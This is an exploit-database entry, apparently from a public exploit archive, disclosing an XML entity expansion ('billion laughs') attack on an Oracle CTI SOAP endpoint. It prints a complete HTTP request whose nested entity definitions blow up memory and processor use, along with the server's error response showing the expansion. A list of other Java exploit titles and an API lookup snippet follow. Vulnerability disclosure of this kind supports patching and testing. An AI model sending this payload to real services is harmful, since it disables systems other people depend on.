Menu

"Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection"

Author

omurugur

Platform

java

Release date

2019-05-21

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
# Exploit Title: Oracle CTI Web Service XML Entity Exp.
# Exploit Author: omurugur
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

URL : http://10.248.68.188/EBS_ASSET_HISTORY_OPERATIONS

 

As can be seen in the following request / response example, the xml entity expansion attack can be performed, and this attack can send requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running.

10kb more request is returned.
Examples Request;

 

POST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: text/xml;charset=UTF-8

SOAPAction: "getCampaignHistory"

Content-Length: 1696

Host: ****

User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Connection: close


<!DOCTYPE foo [<!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;"> <!ENTITY ha5 "&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;"> <!ENTITY ha6 "&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ebs="http://www.avea.com.tr/om/EBS_ASSET_HISTORY_OPERATIONS" xmlns:ave="http://www.avea.com.tr/AveaFrameWo&ha6;rk">

                <soapenv:Header/>

                <soapenv:Body>

                               <ebs:EbsRetrieveWebChatHistoryRequest>

                                               <ave:RequestHeader>

                                                               <ave:RequestId>

                                                                              <ave:GUID>152069827209115206982720</ave:GUID>

                                                               </ave:RequestId>

                                                               <ave:CallingSystem>SIEBEL</ave:CallingSystem>

                                                               <ave:BusinessProcessId>retrieveWebChatHistory</ave:BusinessProcessId>

                                               </ave:RequestHeader>

                                               <ebs:RequestBody>

                                                               <ebs:msisdn>5051234567</ebs:msisdn>

                                               </ebs:RequestBody>

                               </ebs:EbsRetrieveWebChatHistoryRequest>

                </soapenv:Body>

</soapenv:Envelope>

 
Example  Response1;


HTTP/1.1 500 Internal Server Error

Date: Tue, 17 Apr 2018 06:33:07 GMT

Content-Type: text/xml; charset=utf-8

X-ORACLE-DMS-ECID: c55d8ba7-c405-4117-8a70-8b37f745e8f0-0000b9df

X-ORACLE-DMS-RID: 0

Connection: close

Content-Length: 328676

 

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header xmlns:ave="http://www.avea.com.tr/AveaFrameWoHa ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha

! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !rk" xmlns:ebs="http://www.avea.com.tr/om/EBS_ASSET_HISTORY_OPERATIONS"><soapenv:Fault><faultcode>soapenv:Server.SYS000000</faultcode><faultstring>Undefined Avea Service Bus Error</faultstring><detail><faul:ExceptionSchema xmlns:faul="http://www.avea.com.tr/Fault"><faul:UUID>MW-4b9f61d0-7792-4e54-a694-b9ef8c407b7e</faul:UUID><faul:Exception><faul:system>SYSTEM</faul:system><faul:code>OSB-382510</faul:code><faul:message>SYS000000:Undefined Avea Service Bus Error</faul:message><faul:stackTrace>PipelinePairNodePipelinePairNode_requestDynamic Validationrequest-pipelinetrue</faul:stackTrace></faul:Exception></faul:ExceptionSchema></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>
Release Date Title Type Platform Author
2019-07-12 "Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2019-07-12 "Sahi Pro 8.0.0 - Remote Command Execution" webapps java AkkuS
2019-06-17 "Spring Security OAuth - Open Redirector" webapps java Riemann
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting" webapps java Vingroup
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-21 "Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution" webapps java "Jakub Palaczynski"
2019-05-21 "Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection" webapps java omurugur
2019-04-30 "Spring Cloud Config 2.1.x - Path Traversal (Metasploit)" webapps java "Dhiraj Mishra"
2019-04-26 "Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting" webapps java "Dhiraj Mishra"
2019-04-08 "ManageEngine ServiceDesk Plus 9.3 - User Enumeration" webapps java "Alexander Bluestein"
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2016-12-20 "Java Debug Wire Protocol (JDWP) - Remote Code Execution" remote java IOactive
2019-02-25 "Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution" webapps java wetw0rk
2019-02-19 "Jenkins - Remote Code Execution" webapps java orange
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour" dos java "Google Security Research"
2019-02-05 "OpenMRS Platform < 2.24.0 - Insecure Object Deserialization" webapps java "Bishop Fox"
2019-01-28 "Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2018-11-30 "Apache Spark - Unauthenticated Command Execution (Metasploit)" remote java Metasploit
2018-11-14 "Atlassian Jira - Authenticated Upload Code Execution (Metasploit)" remote java Metasploit
2018-10-24 "Apache OFBiz 16.11.04 - XML External Entity Injection" webapps java "Jamie Parfet"
2018-10-22 "Oracle Siebel CRM 8.1.1 - CSV Injection" webapps java "Sarath Nair"
2018-10-01 "ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-10-01 "H2 Database 1.4.196 - Remote Code Execution" webapps java h4ckNinja
2018-09-27 "ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
Release Date Title Type Platform Author
2019-05-21 "Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection" webapps java omurugur
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46885/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46885/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46885/41345/oracle-cti-web-service-ebs-asset-history-operations-xml-entity-injection/download/", "exploit_id": "46885", "exploit_description": "\"Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection\"", "exploit_date": "2019-05-21", "exploit_author": "omurugur", "exploit_type": "webapps", "exploit_platform": "java", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse